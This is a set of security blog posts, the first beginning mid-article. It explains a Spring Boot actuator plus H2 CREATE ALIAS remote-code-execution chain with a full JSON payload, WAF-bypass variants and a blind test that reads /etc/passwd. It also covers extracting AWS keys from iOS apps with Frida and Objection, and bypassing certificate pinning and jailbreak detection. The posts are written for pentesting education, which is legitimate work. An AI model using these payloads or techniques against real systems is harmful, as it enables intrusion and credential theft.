{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return;} throw new IllegalArgumentException(); }');CALL EXEC('curl');"}

The payload comprises of three different parts: the environment modification request to the /actuator/env endpoint, the CREATE ALIAS H2 SQL command, and of course the final OS command injection.

Act One: Exposed Actuators

Spring Boot Actuators creates several HTTP endpoints that allows a developer to easily monitor and manage an application. As Stepankin notes, Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers. For this exploit, the /actuator/env endpoint must be exposed. Developers only need to add management.endpoints.web.exposure.include=env (or worse, management.endpoints.web.exposure.include=*) to their configuration file to expose this.

The /actuator/env endpoint includes the GET and POST methods to retrieve and set the application's environment variables. The POST request uses the following format:

POST /actuator/env HTTP/1.1

{"name":"<NAME OF VARIABLE>","value":"<VALUE OF VARIABLE>"}

You can explore the list of environment variables for the application, which provide data about the execution context and system. However, only a few of these variables can be leveraged to change the app at runtime, and even fewer can be used to achieve code execution. Fortunately, Spring Boot 2.x uses the HikariCP database connection pool by default, which introduces one such variable.

Act Two: H2 CREATE ALIAS Command

HikariCP helps applications communicate with databases. According to its documentation, it accepts the connectionTestQuery configuration which defines the query that will be executed just before a connection is given to you from the pool to validate that the connection to the database is still alive. The matching Spring Boot environment variable is spring.datasource.hikari.connection-test-query. In short, whenever a new database connection is created, the value of spring.datasource.hikari.connection-test-query will be executed as an SQL query first. There are two ways to trigger a new database connection – either by restarting the app with a request to POST /actuator/restart or changing the number of database connections and initializing it by making multiple requests to the application.

This is already pretty serious – you can run arbitrary SQL queries and drop the database if you want. However, let's escalate this further and look into the H2 Database Engine, one of the most popular Java development databases. Think of it as a Java-based SQLite, but extremely easy to integrate into Spring Boot. It only requires one dependency. As such, it's commonly used in Spring Boot development.

Matheus Bernardes highlighted an important SQL command included in H2: CREATE ALIAS. Similar to PostgreSQL's User-Defined Functions, you can define a Java function corresponding to the alias and subsequently call it in an SQL query like you would a function.

CREATE ALIAS GET_SYSTEM_PROPERTY FOR "java.lang.System.getProperty";
CALL GET_SYSTEM_PROPERTY('java.class.path');

Of course, you can use Java's Runtime.getRuntime().exec function, which allows you to execute OS commands directly.

Act Three: Command Injection against WAFs and Limited Execution Contexts

At this point, you might come up against common WAF filters especially with juicy strings like exec() and so on. However, one advantage of such a nested payload is that you can easily find bypasses using various string concatenation techniques. RIPStech's Johannes Moritz demonstrates this by breaking up the query using the CONCAT and HEXTORAW commands:

CREATE ALIAS EXEC AS CONCAT('void e(String cmd) throws',
HEXTORAW('007b'),'java.lang.Runtime rt= java.lang.Runtime.getRuntime();
CALL EXEC('whoami');

Another challenge is that you might be executing code in an extremely limited context. The application might be running in a Dockerized instance without internet access and with limited commands available; Alpine Linux, the most common Linux distribution in Docker, doesn't even have Bash. Additionally, the exec() function executes raw OS commands rather than in a shell, removing helpful tools like boolean comparisons, pipes, and redirections.

Here, it helps to zoom out a little and approach the payload in a holistic manner. Remember that the point of spring.datasource.hikari.connection-test-query is to validate whether the connection to the database is still alive. If the query fails, the application will believe that the database is not reachable and no longer return other database queries. An attacker can leverage this to get a blind RCE where instead of a command like curl, they run grep root /etc/passwd. This returns output (since /etc/passwd does include the root string) and thus the query succeeds. The application continues to function normally. If they run grep nonexistent /etc/passwd, the command returns no output, the Java code throws an error, and the query fails, causing the app to fail.

String shellexec(String cmd) throws {
 java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());
 if (s.hasNext()) {
  return;  // OS command returns output; return output and SQL query succeeds
 throw new IllegalArgumentException(); // OS command fails to return output; throw exception and SQL query fails

This is an interesting way to tie together the three components of the payload to still prove code execution within a limited context. Many thanks to Ian Bouchard for pointing out the possibilities for a blind RCE.

Hopefully, you don't have to deal with that and can get a simple curl pingback instead, like my example vulnerable Spring Boot application.

Burp Collaborator

Conclusion: Dangerous Development Defaults

By exposing the /actuator/env and /actuator/restart endpoints – pretty common in a development setting – a developer puts their application at risk of remote code execution. Of course, this wouldn't be a problem if the application is run locally, but it's not a stretch to imagine a careless developer putting it on a public IP during proptyping.

A common theme running through this write-up and the associated write-ups is that developers can easily introduce severe vulnerabilities in their code without knowing it. Actuators and the H2 database are useful tools to speed up development and prototyping, but exposing them creates a remote code execution vulnerability by default.

#springboot #pentest #cybersecurity #h2 #java


Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs require API keys which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client-side in the first place.

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.


Mattt Thompson shared three ways developers can (insecurely) store client secrets in their apps:

  1. Hard-code secrets in source code
  2. Store secrets in Info.plist
  3. Obfuscate secrets using code generation

For the first two methods, we can simply expose these secrets using static analysis and grepping through the decrypted app files as covered by Ivan Rodriguez. For obfuscated secrets, we can short-circuit the obfuscation and save ourselves hours of reverse-engineering through the magic of Frida's dynamic analysis. This was how I extracted AWS client and secret keys for a bug bounty program.

The following walkthrough assume that you have set up your iOS testing environment according to my iOS app pentesting quickstart post.

Static Analysis

Static analysis begins with extracting your target .ipa file. Make sure that you have installed iproxy and frida-ios-dump.

  1. In one terminal, run iproxy 2222 22
  2. Open the target app on your iDevice
  3. In another terminal, run ./ <APP DISPLAY NAME OR BUNDLE IDENTIFIER>
  4. You should now have a <APPNAME>.ipa file in your current directory
  5. mv <APPNAME>.ipa <APPNAME>.zip
  6. unzip <APPNAME>.zip
  7. The files are now unzipped to a Payload folder; open it up and check that an <APPNAME>.app file has been created (<APPNAME> might differ between the .ipa and .app files)
  8. mkdir AppFiles
  9. mv Payload/<APPNAME>.app/* AppFiles/

At this point, you should see a bunch of files in the AppFiles directory. While the files obviously differ from app to app, here are a few keys files to look into.

Info.plist and other *.plist files: Info.plist functions similarly to manifest.json for Android apps. It contains app metadata and can point out weaknesses or new attack surfaces such as custom scheme URLs. Of course, it can also contain stored credentials. You can use macOS' built-in plutil command to lay out the data nicely in JSON with plutil -p Info.plist.

Some plist files can be stored in binary rather than XML, which makes it harder to parse directly. Run plutil -convert xml1 Info.plist to convert them back to XML.

Quick tip: while GoogleService-Info.plist exists on many apps and includes an extremely juicy-looking API_KEY value, this is not a sensitive credential. It needs to be paired with a custom token to have any impact. Not all API keys are created equal; some have proper access controls and can be exposed without risk. Check out keyhacks to quickly identify and validate sensitive API keys.

You also want to begin grepping and parsing through the various files; grep "API_KEY" -r * or similar is a quick and dirty solution.

At this point, you should also poke at interesting files that hint at vulnerable functionality. Check html files (maybe an internal URL scheme vulnerable to DOM XSS?), templates, and third-party frameworks that could have known vulnerabilities.

With luck, you might walk away with a straightforward credential exposure.

Dynamic Analysis

Most times, it won't be that straightforward. Nevertheless, there are clues that might point you towards obfuscated credentials.

In one bug bounty program, I noticed that the app I was testing uploaded profile pictures to an S3 bucket, but the request was hidden from interception and the credentials were not stored in plaintext in the app files. Nevertheless, given that the upload was occurring, it was a safe bet to assume that credentials were being exchanged.

At this point, I could dive into the binary with Ghidra and attempt to walk through the obfuscated code to decrypt the credentials, but there is a way to short-circuit this whole process.

Think of it this way: at the end of the day, no matter how much obfuscation is used, the credentials need to be sent in plaintext (for insecure implementations) to the server. For that to happen, a method needs to be invoked somewhere in the code using these credentials.

This is where Frida and Objection comes in. You want to hook onto the method that makes that call, and dump the arguments to that method – which should hopefully be the credentials you are looking for.

First, you need to identify the method. Fire up Objection with objection --gadget <APPNAME> explore. Next, run ios hooking list classes to dump all available classes in the app. This is a huge list. Grep through the list and identify interesting classes. For example, I looked for the classes with AWS or Amazon in the name. As luck would have it, there was an AWSCredentials class, among other interesting class names.

Objection console

Next, you want to begin watching these classes. Run ios hooking watch class <CLASSNAME> in the Objection console for each class. Now, perform the action in the app where the potentially vulnerable credentials could be exposed. In this case, I performed the profile picture upload function in the app, which triggered the following response:

(agent) Watching method: - initKey:
(agent) Watching method: - initSDK:
(agent) Registering job gk6i5disc88. Type: watch-class-methods for: AWSCredentials
myApp on (iPhone: 13.1.2) [usb] # (agent) [gk6i5disc88] Called: [AWSS3Client initKey:] (Kind: instance) (Super: AWSClient)

Awesome. So it looks like Frida successfully hooked onto the AWSCredentials class which includes the initKey and initSDK methods. When I performed the profile picture upload, the initKey method was called.

Now, we want to dump the arguments passed into the initKey class method. In objection, run ios hooking watch method "-[AWSCredentials initKey:]" --dump-args. Note that the format here for the class method is "-[<CLASSNAME> <METHOD>:]". Once again, I performed the profile picture upload in the app.

(agent) [gk6i5disc88] Called: -[AWSCredentials initKey:] 1 argument(Kind: instance) (Super: NSObject)
(agent) [gk6i5disc88] Argument dump: [AWSCredentials initKey: <AWS CLIENT KEY>:<AWS SECRET KEY>]

Success! Using dynamic analysis, I exposed the AWS keys used by the application. Of course, this meant that the app was using an insecure communication protocol with S3 as there are credential-less ways of implementing S3 uploads.


Hunting for secrets in iOS apps is a low-effort, high-payoff task that can help ease you into pentesting an application. (Un)fortunately, secrets management remains a hard problem especially for less-experienced developers, and continues to crop up as a recurring vulnerability. It's easy to forget that credentials are still exposed even when compiled into an app binary.

#ios #pentest #cybersecurity #frida #aws

Updated April 19, 2020: – Install OpenSSH through Cydia (ramsexy) – Checkra1n now supports Linux (inhibitor181) – Use a USB Type-A cable instead of Type-C (c0rv4x)

Updated April 26, 2020: – Linux-specific instructions (inhibitor181)

Updated August 14, 2020: – Burp TLS v1.3 configuration


I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has a Xcode's iOS Simulator, which mimics the software environment of an iPhone and not the hardware. As such, iOS app pentesting requires an actual OS device.

Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. Portswigger's Burp Suite Mobile Assistant needs to be installed onto a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release off the checkra1n jailbreak, A5-A11 iPhone, iPad and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up and new tools are also being released.

As such, I'm writing quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak and consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found on iOS apps using the tools installed here.



Let's start with the basics. You need an A5-A11 iDevice, preferably an iPhone. I used an iPhone 8. Thanks to checkra1n, you don't really have to worry about the iOS version; as of now, it supports the latest iOS 13.3. Other than macOS, checkra1n also supports Linux.


Warning: Jailbreaking your iDevice significantly weakens your security posture. You should not be doing this on your primary device. In fact, you should not use the jailbroken device for anything other than pentesting.

Please jailbreak your device with a USB-A cable as USB-C jailbreaks have caused issues.

Take note that checkra1n is a semi-tethered jailbreak; every time you restart the iPhone, the jailbreak is lost, so you have to do this again.

  1. Download the latest checkra1n jailbreak at
  2. Connect your iPhone to your macOS device and open checkra1n with Applications → Right click checkra1n → Open.
  3. Unlock your iPhone and click “Start” in checkra1n
  4. Follow the rest of the steps in checkra1n and restart as necessary


For Linux, follow the instructions here to install checkra1n before proceeding to open it and run the same steps to jailbreak your iPhone.

Congrats! You have a jailbroken iPhone. Let's get down to business.


This is super simple. On the jailbroken iPhone, open up the checkra1n app, then click “Cydia” in the “Install” section.

checkra1n app

Now you have Cydia and can install several packages that will help in your testing. More on that later.


While you can SSH into your iPhone over the wireless network, it's a lot faster and more reliable to do that over USB.

On your iPhone, go to the Cydia store and install the OpenSSH package. After installing, it should restart Springboard.

Back on your connected macOS devices, run:

  1. brew install libusbmuxd (apt-get install libusbmuxd* for Linux)
  2. iproxy 2222 22 (iproxy 2222 44 for Linux)
  3. In another terminal, run ssh root@localhost -p 2222
  4. For the password, enter alpine
  5. You should now have an SSH session in your iPhone

One perk is that you can also transfer files to and from your iPhone over SFTP using a client like FileZilla. Just select the SFTP protocol, set your host to localhost and port to 2222.

FileZilla settings

Frida and Objection

It's time to install my two favorite mobile app testing tools, Frida and Objection. I won't go through in detail about their usage here, just the set up. Frida has an iOS guide I will refer to.

  1. On your macOS device, run pip3 install frida-tools
  2. On your iPhone, open Cydia and add Frida’s repository by going to Sources → Edit → Add and enter
  3. Go to Search → Enter Frida → Install
  4. Back on your macOS device, run pip3 install objection
  5. Finally, run objection --gadget "" explore to check that everything is integrated properly

Proxy Traffic and Bypass Cert Pinning

Proxying traffic through Burp Suite is fairly standard; follow the steps outlined in Yogendra Jaiswal's post. Recently, Burp Suite added the option to disable TLSv1.3 in version 2020.4, which helps iOS trust your custom certificates.

  1. On Burp Suite, go to Proxy → Options → Proxy Listener → Add → Bind to port: 1337 → Bind to address : All interfaces (or select a Specific Address) → TLS Protocols → Use Custom Protocols → Uncheck TLSv1.3 → “OK”
  2. On your iPhone, Settings → Wi-Fi → Info → Configure Proxy → Manual → Set server and port to the ones from the previous step
  3. On your iPhone, go to http://burp → Click “CA Certificate” → Download profile → Settings → General → Profiles & Device Management → Portswigger CA → Install

Now traffic should be proxied through Burp – except for apps that utilize certificate pinning. Fortunately, the SSL Kill Switch 2 certificate pinning bypass tool was recently updated to support iOS 13.

  1. Make sure you have the following packages installed in Cydia: wget, Debian Packager, Cydia Substrate, PreferenceLoader
  2. Go to the SSL Kill Switch 2 release page and copy the link to the latest .deb release
  3. SSH into your iPhone (see the iProxy section above) and run wget <RELEASE URL FROM STEP 2>dpkg -i <DOWNLOADED PACKAGE NAME>killall -HUP SpringBoardrm <DOWNLOADED PACKAGE NAME>
  4. On your iPhone, go to Settings → SSL Kill Switch 2 (it should be at the bottom) → Disable Certificate Validation

SSL Kill Switch 2 settings

You should be good to go.

Bypass Jailbreak Detection

Jailbreak detection is annoying but solvable. Of all the packages that support iOS 13, I've found that the Liberty Lite Cydia module works the most consistently.

  1. On your iPhone, open Cydia and add module author Ryley Angus’ repository by going to Sources → Edit → Add and enter
  2. Go to Search → Enter Liberty Lite → Install
  3. Once installed, go to Settings → Liberty → Block Jailbreak Detection → Enable for the app you want to bypass

Kill and re-open your app. If it's still not bypassed, you can try other modules.

Liberty Lite settings

Dump App Files

Unlike Android apk files, iOS apps are stored as encrypted ipa files, preventing easy access and analysis. Having installed iproxy and Frida, we can use frida-ios-dump to do this at runtime.

  1. On your macOS device, git clone && cd frida-ios-dump
  2. sudo pip3 install -r requirements.txt --upgrade
  3. In another terminal, run iproxy 2222 22 if it's not already running
  4. To dump an app's file, ./ <APP DISPLAY NAME OR BUNDLE IDENTIFIER>

Typically, I like to symlink to my tools so it's easily accessible from my PATH with ln -s <ABSOLUTE PATH TO> /usr/local/bin/dump-ipa. Now whenever I want to dump an app I can use the dump-ipa command anywhere.


With this quickstart guide, you now have the basic tools set up to begin iOS app pentesting, from searching for secrets in the app files, to hooking classes, and of course testing the web API. Best of all, this is on modern iOS hardware and versions.

I hope this guide is helpful for those looking to set up their iOS testing labs. I will be following up with a writeup on several bugs I've found with these tools and hopefully point towards typical issues to look out for.

#ios #pentest #cybersecurity #frida #jailbreak

Enter your email to subscribe to updates.